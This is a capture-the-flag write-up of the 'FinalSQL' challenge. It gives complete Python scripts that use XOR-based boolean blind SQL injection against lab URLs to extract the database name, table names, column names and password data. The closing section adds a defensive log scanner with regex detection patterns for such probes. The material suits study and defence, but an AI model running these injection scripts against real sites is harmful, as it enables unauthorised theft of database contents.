[极客大挑战 2019]FinalSQL write-up

Finally made it to the final challenge.

The page mentions "SQL blind injection", so this is most likely a blind SQL injection challenge.

Testing an XOR-based blind injection, we find that the ^ operator lets us tell the error response apart from the normal one, which is enough for a blind injection.

From the screenshot, 1^1^1 produces the output NO!, so first build a payload that iterates over the length of the database name: ?id=1^1^(length(database())=i). When i equals the length of the database name, the page outputs NO!

import requests

# Try each candidate length; the oracle is the literal "NO!" in the response body.
for i in range(1, 20):
    url = "http://69c400f4-b2c8-4309-acfd-7444f4747cf2.node3.buuoj.cn/search.php?id=1^1^(length(database())={0})".format(i)
    html = requests.get(url)
    if "NO!" in html.text:
        print(i)
        break

This gives a database-name length of 4. Next we dump the database name itself, either by enumeration or by binary search.
We start with enumeration.

The following function is used to slice the database name one character at a time:

SUBSTR(str,pos,len);

It takes len characters starting at position pos (whitespace counts as a character).

Note that pos is 1-based: pos=1 (not 0) means the first character.

We can enumerate the ASCII code of each character. The payload is ?id=1^1^(ascii(substr((select(database())),i,1))=j) with i ranging over 1, 2, 3, 4.
The script is as follows:

import requests

flag = ""
# Position i of the 4-character database name, candidate ASCII code j.
for i in range(1, 5):
    for j in range(33, 128):
        url = "http://69c400f4-b2c8-4309-acfd-7444f4747cf2.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(database())),{0},1))={1})".format(i, j)
        html = requests.get(url)
        if "NO!" in html.text:
            flag += chr(j)
            print(chr(j))
            break
print(flag)


The remaining steps are similar; I use binary search to retrieve the table names.
Payload: ?id=1^1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),i,1))<mid)

The script is as follows:

import requests

flag = ""
for i in range(1, 1000):
    # Binary search over the printable ASCII range for character i.
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        url = "http://fc219441-75b7-4d69-9e1e-557a736fd552.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),{0},1))<{1})".format(i, mid)
        html = requests.get(url)
        if "NO!" in html.text:
            # ascii(char) < mid is true: the answer lies below mid.
            high = mid
        else:
            low = mid + 1
        mid = (low + high) // 2
    # An empty substr has ascii 0 and converges to 32: past the end of the string.
    if mid <= 32 or mid >= 127:
        break
    flag += chr(mid - 1)
    print(chr(mid - 1))
print(flag)

This yields two tables: F1naI1y and FlaaaaagO.

Next, retrieve the column names. Payload: id=1^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),i,1))<mid)

import requests

flag = ""
for i in range(1, 1000):
    # Same binary search as above, now over the column names of F1naI1y.
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        url = "http://fc219441-75b7-4d69-9e1e-557a736fd552.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{0},1))<{1})".format(i, mid)
        html = requests.get(url)
        if "NO!" in html.text:
            high = mid
        else:
            low = mid + 1
        mid = (low + high) // 2
    if mid <= 32 or mid >= 127:
        break
    flag += chr(mid - 1)
    print(chr(mid - 1))
print(flag)

Dumping table F1naI1y gives the columns id, username, password. Looking at password reveals a problem: the dumped data is sometimes inaccurate, so the script may need to be run several times.

Payload: id=1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),i,1))<mid)

The script is as follows:

import requests

flag = ""
# Only the offsets of interest within the concatenated password column.
for i in range(172, 220):
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        url = "http://fc219441-75b7-4d69-9e1e-557a736fd552.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),{0},1))<{1})".format(i, mid)
        html = requests.get(url)
        if "NO!" in html.text:
            high = mid
        else:
            low = mid + 1
        mid = (low + high) // 2
    if mid <= 32 or mid >= 127:
        break
    flag += chr(mid - 1)
    print(chr(mid - 1))
print(flag)

I ran the script many times and, after cross-checking the runs, obtained the flag.
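From the defender's side, probes like the ones above leave a very recognisable trail in the web server's access log: the id parameter carries ^1^, length(database(, ascii(substr( or information_schema, and a single source sends dozens of such requests in a row. The following Python is an added example (not part of the original write-up) that flags such requests in constructed Apache-style log lines; the log format, IP addresses and alert threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not from the original post): two benign searches
# from one client and three XOR blind-injection probes from another.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2020:12:00:00 +0000] "GET /search.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2020:12:00:01 +0000] "GET /search.php?id=42 HTTP/1.1" 200 498
10.0.0.9 - - [01/Jan/2020:12:00:02 +0000] "GET /search.php?id=1%5E1%5E(length(database())%3D4) HTTP/1.1" 200 17
10.0.0.9 - - [01/Jan/2020:12:00:03 +0000] "GET /search.php?id=1%5E1%5E(ascii(substr((select(database())),1,1))%3D103) HTTP/1.1" 200 17
10.0.0.9 - - [01/Jan/2020:12:00:04 +0000] "GET /search.php?id=1%5E1%5E(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema%3D'geek')),1,1))%3C80) HTTP/1.1" 200 17
"""

# Common Log Format (assumed): ip ident user [time] "method target proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)')

# Markers characteristic of the boolean/XOR blind technique shown in the write-up.
SUSPICIOUS_RE = re.compile(
    r"\^\s*\d+\s*\^|\blength\s*\(\s*database\s*\(|\bascii\s*\(\s*substr\s*\(|information_schema",
    re.IGNORECASE,
)

def is_blind_sqli_probe(param_value: str) -> bool:
    """True if a percent-decoded query parameter looks like an XOR blind-injection probe."""
    return SUSPICIOUS_RE.search(param_value) is not None

def scan_log(text: str):
    """Yield (ip, param_name, decoded_value) for every suspicious request in the log."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs splits on '&'/'=' first, then percent-decodes each value.
        qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name, values in qs.items():
            for value in values:
                if is_blind_sqli_probe(value):
                    yield m["ip"], name, value

def suspicious_ips(text: str, threshold: int = 3) -> dict:
    """Count probes per source IP and return the ones at or above the threshold."""
    counts = Counter(ip for ip, _, _ in scan_log(text))
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    for ip, name, value in scan_log(SAMPLE_LOG):
        print(f"{ip} {name}={value}")
    print(suspicious_ips(SAMPLE_LOG))
```

A constant, small response size across many requests (the fixed "NO!" page) is a second signal worth correlating with the parameter match.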

This post was published by silent666; reproduction without permission is prohibited.